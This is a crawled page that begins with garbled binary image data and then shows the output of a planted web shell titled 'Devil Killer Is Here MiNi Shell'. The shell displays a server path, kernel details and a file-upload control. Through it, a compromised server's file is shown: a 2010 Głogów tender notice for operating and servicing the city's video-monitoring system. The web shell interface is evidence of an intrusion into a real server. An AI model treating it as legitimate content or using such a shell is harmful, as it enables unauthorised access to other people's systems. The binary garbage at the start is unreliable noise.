JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20101005/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20101005/319432-N-2010.html

<p class="kh_header"><b>Głogów: Świadczenie usługi całodobowej obsługi monitoringu wizyjnego miasta Głogowa</b><br>
<b>Numer ogłoszenia: 319432 - 2010; data zamieszczenia: 05.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Głogów , ul. Rynek 10, 67-200 Głogów, woj. dolnośląskie, tel. 076 7265437, 527, faks 076 7265437.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.glogow.sbip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi całodobowej obsługi monitoringu wizyjnego miasta Głogowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Świadczenie usługi całodobowej obsługi monitoringu wizyjnego miasta Głogowa:

1) na stanowisku operatora systemu w centrum monitoringu,

2) poprzez zapewnienie serwisu technicznego do prawidłowej i ciągłej pracy systemu.

2.	Opis przedmiotu zamówienia. 
      
Szczegółowy zakres rzeczowy.

	System monitoringu miejskiego miasta Głogowa jest systemem komunikacji radiowej MDMS pomiędzy centrum a poszczególnymi kamerami (bezprzewodowa transmisja  w topolo-gii punkt-wielopunkt). Składa się z 24 punktów kamerowych zlokalizowanych w różnych punk-tach na terenie miasta, radiowej stacji bazowej zlokalizowanej na wieży ratuszowej oraz centrum monitoringu zlokalizowane w budynku Straży Pożarnej przy  Centrum powiadamiania ratun-kowego. Część wizyjna systemu oparta jest na aplikacji BVMS firmy Bosch.
 
Zamawiający zastrzega możliwość dalszej rozbudowy w okresie obowiązywania umowy. Więk-sza ilość kamer może wymagać większej ilości pracowników na służbie jednocześnie i  zmiany warunków umowy.

I.	Obsługa monitoringu na stanowisku operatora w centrum monitoringu.

1.	Realizowana  będzie poprzez :  
a) 	obserwację (dozór) zobrazowanej wizji z kamer systemu i jego obsługę,
b) 	 natychmiastowe powiadamianie odpowiednich służb np. policji, straży pożarnej czy po-gotowia ratunkowego w sytuacjach zaobserwowanych zagrożeń, wypadków, zdarzeń czy też klęsk żywiołowych zgodnie z instrukcją  operatora centrum monitoringu wizyjnego miasta Głogowa, 
c) 	niezwłoczne powiadamianie serwisu technicznego oraz wskazanego przedstawiciela Za-mawiającego systemu o wszelkich awariach,
d) 	pełnienie przez operatorów 8-godzinnych dyżurów w systemie całodobowym.

2.	Pracownik (operator) obowiązany jest do:
a) 	posiadania licencji pracownika ochrony fizycznej co najmniej pierwszego stopnia,
b) 	pełnienia służby w odpowiednim umundurowaniu zgodnym z wewnętrznymi przepisami firmy ochrony lub wg życzenia Zamawiającego,
c) 	prowadzenia książki służb, dziennego raportu zdarzeń oraz wykazu awarii systemu zgod-nie z instrukcją  operatora centrum monitoringu wizyjnego miasta Głogowa.

3.	Wykonawca zobowiązuje się do przejęcia dotychczasowej obsługi Centrum Monitoringu i zapewnienia im pracy na stanowisku operatora Centrum Monitoringu w Głogowie oraz pełnego dotychczasowego wynagrodzenia brutto przez okres obowiązywania umowy zgodnie z obowiązującym Kodeksem Pracy Dz. U 98.21.94 z dnia 26 czerwca 1974 r. art. 231
 
Informacje szczegółowe dotyczące pracowników:
1)	dotychczasowy pracodawca - zakład budżetowy Głogowskie Obiekty Usługowe,         z siedzibą przy ul. Wita Stwosza 1, 67-200 Głogów;
2)	ilość pracowników do przejęcia - pięciu operatorów systemu monitoringu: 4 osoby      z licencją drugiego stopnia pracownika ochrony fizycznej, jedna osoba z licencją pierwszego stopnia, wszyscy z ponad rocznym stażem na tym stanowisku;
3)	umowy o pracę z dotychczasowym pracodawcą - wszystkie na czas nieokreślony      na pełny etat;
4)	wszystkie koszty pracodawcy związane z zatrudnieniem 5 operatorów wynoszą          w skali 2010 roku 183.660,00 zł (szczegółowe informacje na temat poszczególnych składników wynagrodzeń można uzyskać u Zamawiającego). 
5)	wynagrodzenie tych pracowników winno uwzględniać coroczne waloryzacje               o wskaźnik wzrostu płac ( na 2011 rok 2,3 % )
6)	wobec tych pracowników  nie ma żadnych zaległości oraz potrąceń płacowych,         nie ma zaległości urlopowych;
7)	w okresie trwania niniejszej umowy następujący pracownicy nabędą prawa do wypłaty dodatkowych składników wynagrodzenia:1 osoba  nagroda jubileuszowa 30 lecie pracy;  
8)	wszyscy pracownicy posiadają aktualne orzeczenia lekarskie wymagane dla pracowników posiadających licencję ochrony;
9)	pracownicy niepełnosprawni - 1 osoba stopnia znacznego;
10)	pracownicy szczególnie chronieni - brak;
11)	pracownicy przeznaczeni do przejęcia nie są członkami związków zawodowych i nie są objęci ochrona związkową;
12)	w okresie wykonywania zamówienia pracownicy nie będą objęci ochrona przedemerytalną;
13)	nie są wszczęte pracownicze postępowania sądowe.

4.	W przypadku zmiany pracownika (wyłącznie przy dobrowolnej rezygnacji pracownika) Wykonawca informuje wcześniej o tym Zamawiającego z wyprzedzeniem co najmniej 14 dniowym.

5.	Przy zmianie pracownika w okresie obowiązywania umowy Wykonawca odpowiada za właściwe przygotowanie i przeszkolenie pracowników wyznaczonych do obsługi Centrum Monitoringu i pokrywa koszty ich szkolenia.

6.	Zamawiający dokona weryfikacji nabytych umiejętności pracowników zaproponowanych przez   Wykonawcę i zdecyduje o ich dopuszczeniu do służby.

7.	Wykonawca zobowiązuje się do wyznaczenia do służby osób z umiejętnościami biegłej obsługi komputera oraz ze zdolnościami do przyswajania sobie nowych zagadnień związanych z wykonywaniem przedmiotu niniejszej umowy. 

8.	Zamawiający raz na miesiąc dokonuje analizy efektywności pracy operatorów i może wnosić o zmianę pracowników najmniej efektywnych, a Wykonawca zastosuje się do złożonego wniosku w okresie co najwyżej 14 dniowym.

9.	Wykonawca zapewnia sprzątanie pomieszczeń Centrum Monitoringu oraz zabezpieczenie we wszelkie materiały eksploatacyjne, biurowe (w tym 2 drukarki kolorowe) oraz środki czysto-ści.  

II.	Zapewnienie serwisu technicznego do prawidłowej i ciągłej pracy systemu.

1.	Zakres stałej obsługi serwisowej obejmuje w szczególności:

a) 	Nadzór nad prawidłową i nieprzerwaną pracą systemu oraz jego programów.
b) 	Usuwanie wszelkich usterek i awarii; w przypadkach krytycznych i paraliżujących pracę  systemu czas usunięcia awarii od chwili wystąpienia wynosi do 12 godz. 
c) 	 Bieżąca konserwacja i wymiana urządzeń oraz podzespołów wynikająca z bieżących potrzeb prawidłowego funkcjonowania systemu.
d) 	Naprawy oraz modernizacje komputerów.
e) 	Archiwizowanie danych ze wszystkich systemów.
f) 	Ochrona informacji zgromadzonych w bazach danych zgodnie z ustawą o ochronie danych osobowych.
g) 	Ochrona systemu monitoringu przed dostępem z zewnątrz.
h) 	Wykonywanie okresowych przeglądów i konserwacji (2 razy w roku) punktów kamerowych, urządzeń zainstalowanych w stacji bazowej oraz w Centrum Monitoringu.
i) 	Okresowe czyszczenie kloszów kamer (minimum raz na kwartał, a w razie zaistniałej potrzeby na bieżąco). 

2.	Rozliczanie kosztów poniesionych przez Wykonawcę dla zapewnienia serwisu technicznego oraz prawidłowego funkcjonowania Centrum Monitoringu.

a) 	Ustala się kwotę przeznaczoną na pokrycie kosztów zakupu materiałów i części do technicznej obsługi serwisowej w kwocie 20.000 zł brutto na okres 12 miesięcy, a 30.000 zł na okres całej umowy, którą należy uwzględnić przy przygotowywaniu oferty całościowej. Kwota ta podlega ścisłemu rozliczeniu fakturowemu za każdy dokonany zakup, a w przypadku jej nie wykorzystania podlega zwrotowi.
b) 	Koszty materiałów i części zamiennych oraz wynajmu sprzętu (np. podnośnika samochodowego) ponosi Wykonawca w ramach kwoty określonej w ust 2 pkt. 1).

c) 	Każdy zakup w kwocie powyżej 1.000 zł musi być uzgodniony z Zamawiającym i zaakceptowany przez eksperta nadzorującego system w imieniu Zamawiającego.

d) 	W przypadku awarii, której koszt naprawy przekracza posiadane środki w ramach kwoty określonej w ust 2 pkt. 1) musi być sporządzony protokół konieczności zatwierdzony przez eksperta nadzorującego system w imieniu Zamawiającego, jak również zatwierdzeniu przez eksperta wymagany jest wybór firmy dokonującej naprawy. Koszt takiej naprawy pokrywa Zamawiający.

e) 	Zamawiający pokrywa koszty związane z utrzymaniem systemu monitoringu w  zakresie:
.	opłaty do Urzędu komunikacji Elektronicznej za prawo do dysponowania częstotliwością,
.	dzierżawa pomieszczeń Centrum Monitoringu oraz media,
.	dzierżawa elewacji części budynków, na których zamontowane są punkty kamerowe,
.	energia elektryczna punktów kamerowych K17-K24,
.	dostęp do sieci Internetowej,
.	usługi telefonii stacjonarnej,
.	usługi doradcze eksperta.


4. Rozliczenie wykonania usługi. 

Z wybranym wykonawcą zostanie zawarta umowa za cenę umowną obejmująca rzeczowy zakres zamówienia określony w niniejszej specyfikacji istotnych warunków zamówienia i ofercie wybranego wykonawcy. 

5. Rozliczenie za wykonanie usługi: 

a)	podstawą do rozliczenia usługi będzie przedstawienie Zamawiającemu zestawienia wynagrodzenia za dany miesiąc ( z dołu ) wyliczonego jako 1/12 kwoty określonej w § 9 umowy 
b)	rozliczenia będą następowały faktura VAT jeden raz w miesiącu - po wykonaniu przewidzianych do wykonania czynności..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>powtórzenie tego samego rodzaju zamówień, zgodnie z przedmiotem zamówienia, stanowiących nie więcej niż 50% wartosci zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.34.20.00-4, 79.71.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 10.000 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	koncesji MSWiA na prowadzenie działalności w zakresie ochrony fizycznej lub oświadczenie, że na dzień otwarcia ofert wykonawca spełnia wszelkie warunki do wystąpienia o koncesję i zobowiązuje się do jej uzyskania i przedłożenia Zamawiającemu przed terminem podpisania umowy (w przypadku złożenia oświadczenia konieczne jest przedłożenie licencji pracownika ochrony fizycznej drugiego stopnia, którą to powinna posiadać co najmniej jedna osoba będąca wspólnikiem spółki prawa handlowego, członkiem zarządu, prokurentem lub pełnomocnikiem ustanowionym przez przedsiębiorcę do kierowania działalnością określoną w koncesji),
b)	licencję zabezpieczenia technicznego drugiego stopnia,
Ocena spełnienia warunku będzie dokonana na podstawie złożonych koncesji i licencji na zasadzie spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w ciągu całego okresu prowadzenia działalności wykonali, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, przez co należy rozumieć:
a)	wykonanie usług serwisowych systemu monitoringu wyłącznie miejskiego składającego się z minimum 20 kamer opartego na łączności radiowej i systemie zarządzania sygnałami wizyjnymi BVMS (Bosch Video Management System),
b)	wykonanie prac wdrożeniowych lub usług w zakresie utrzymania sieci radiowej monitoringu,
c)	posiadać przeszkolenie w zakresie znajomości systemu zarządzającego sygnałami wizyjnymi BVMS (Bosch Video Management System),
Ocena spełnienia warunku będzie dokonana na podstawie złożonego wykazu wykonanych usług i posiadanych przeszkoleń</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie określa się minimalnych standardów. Spełnienie warunku zostanie ocenione na podstawie złożonego oświadczenia na zasadzei spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:a)	dysponują osobami zdolnymi do wykonania zamówienia tj.: kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych, w zakresie niezbędnym do wykonania zamówienia,
b)	kadra musi posiadać stwierdzenie przygotowania zawodowego do wykonania samodzielnych funkcji w budownictwie (uprawnienia), wpis na listę właściwej Okręgowej Izby Samorządu Zawodowego;
Ocena spełniania warunku będzie dokonana na podstawie złożonego wykazu osób, które będą odpowiedzialne za realizację zamówienia oraz oświadczenia, że osoby te posiadają wymagane uprawnienia na zasadzie spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o udzielenie zamówienia mogą się ubiegać wykonawcy, którzy:a)	dla zabezpieczenia bieżącego wykonania robót posiadają środki własne lub dostęp do kredytu w wysokości minimum 30.000 zł
b)	posiadają ubezpieczenie OC z tytułu prowadzonej działalności gospodarczej;
Ocena spełnienia warunku będzie dokonana na podstawie złożonej informacji banku lub spóldzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek potwierdzający wysokość posiadanych środków finansowych lub zdolność kredytową oraz na podstawie złożonego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od OC, dowodu jego opłacenia na zasadzie spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-oświadczenie o przebytym szkoleniu w zakresie znajomości systemu zarządzającego sygnałami wizyjnymi BVMS (Bosch Video Management System)
- opłacona polisa w zakresie od odpowiedzialności kontraktowej i deliktowej</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)	Zmiana postanowień zawartej umowy może nastąpić za zgodą obu Stron wyrażoną na piśmie pod rygorem nieważności.
2)	Niedopuszczalna jest zmiana postanowień zawartej umowy oraz wprowadzanie do umowy postanowień niekorzystnych dla Zamawiającego.
3)	Zamawiający przewiduje możliwość wprowadzenia zmian do zawartej umowy 
w formie pisemnego aneksu na następujących warunkach :
a)	Wykonawca może dokonywać zmiany kluczowych osób, przedstawionych 
w ofercie, jedynie za uprzednią pisemną zgodą Zamawiającego, 
b)	Pozostałe zmiany 
.	jeśli zmiana stawki podatku VAT będzie  powodować  zwiększenie  kosztów  wyko-nania  po stronie  wykonawcy, Zamawiający  dopuszcza  możliwość zwiększenia  wynagrodzenia  o kwotę równą różnicy  w kwocie  podatku  VAT  zapłaconego  przez  wykonawcę, 
.	jeśli  zmiana  stawki VAT  będzie powodować zmniejszenie  kosztów wykonania  umowy  po  stronie wykonawcy, Zamawiający  przewiduje  możliwość  zmniejsze-nia  wynagrodzenia o kwotę stanowiącą różnicę  kwoty podatku  VAT  do zapłace-nia  przez  wykonawcę,
